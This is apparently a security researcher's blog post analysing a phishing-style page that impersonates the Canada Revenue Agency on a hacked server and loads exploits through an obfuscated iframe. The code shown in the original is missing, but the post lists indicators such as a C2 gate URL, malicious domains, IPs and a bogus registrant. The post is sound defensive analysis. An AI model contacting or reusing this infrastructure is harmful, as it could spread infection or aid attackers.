I found a malicious page placed on a hacked server:
CRA stands for Canada Revenue Agency, as you can see in the page’s source code below:
The meta tag redirects to the Canada Revenue Agency’s website after a few seconds:
But what is the rest of the obfuscated code?
Here is the deobfuscated version (courtesy of Wepawet):
Now we know more about the intent behind this cra.html page. The URL the iframe points to will load multiple exploits:
I noticed that Google Chrome warned me prior to running the script (which I did anyway for testing purposes):
This is a pretty cool feature that can prevent many infections. Thanks Google 
Following a successful installation, the malware will call 212.150.164.206/email/gate.php at regular intervals and send data in what looks like a custom obfuscation form:
Let’s check out the malicious domain: somerandomiframedomain.com
IP: 92.38.232.92
Location: Moscow, Russia
ASN: AS12695 (DINET-AS Digital Network JSC)
Registrar: BIZCN.COM, INC.
Registrant information is bogus (of course):
Ricardo GALENO @austin.co.com
9999999999 fax: 9999999999
1928 BURTON DR 157
Savannah TX 78741
us
Other domain names on that server include:
aecdmkk.cz.cc
analyticgoogle.net
boleslaw.ru
borsteodor.com
facebook-hot.com
facebook-top.com
fbfbvfbfbrgrgr.cz.cc
fruittrust.com
greatkelly.com
iglgxib.cz.cc
lsospawwdfg.cz.cc
nogavitu.net
proderton.com
qpofuyfjhask.cz.cc
tarabona.cz.cc
tha-facebook.com
uasifyufttgas.cz.cc
upsclients.org
upstrack.org
varealestateblog.com
vbnbvhyftdgd.cz.cc
wowldskuydg.cz.cc
yxrenhe.cz.cc
This ASN is deeply involved in allowing CnC servers and other bot related activities:
Google Safe Bowsing
malc0de.com
At this moment, I am not sure what the connection (if any) between the malware and the Canadian Revenue Agency is.
Here are a couple of VirusTotal reports from some of the binaries that were dropped. VT1, VT2.
Jerome Segura
Leave a reply
